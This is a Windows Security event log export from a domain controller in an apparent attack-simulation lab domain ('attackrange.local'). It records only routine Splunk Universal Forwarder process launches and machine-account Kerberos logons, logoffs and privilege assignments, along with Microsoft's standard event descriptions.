Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264548
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264550
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x530
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264551
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828CE5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264554
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82C4D9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264553
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82C4D9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62758
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264552
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82C4D9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:20:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264555
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264557
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x89c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264556
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1778
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:20:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264558
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1664
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264560
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264559
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1728
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264561
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264564
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82FE05
Logon Type: 3
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264563
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82FE05
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62772
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264562
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82FE05
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:21:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264565
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264567
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264566
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:21:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264568
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1430
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264570
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264569
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264571
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264573
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x832B94
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62777
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264572
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x832B94
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264575
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x833212
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264574
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833212
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 03:21:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264576
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x832B94
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264579
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833EC1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264578
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x833EC1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53467
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
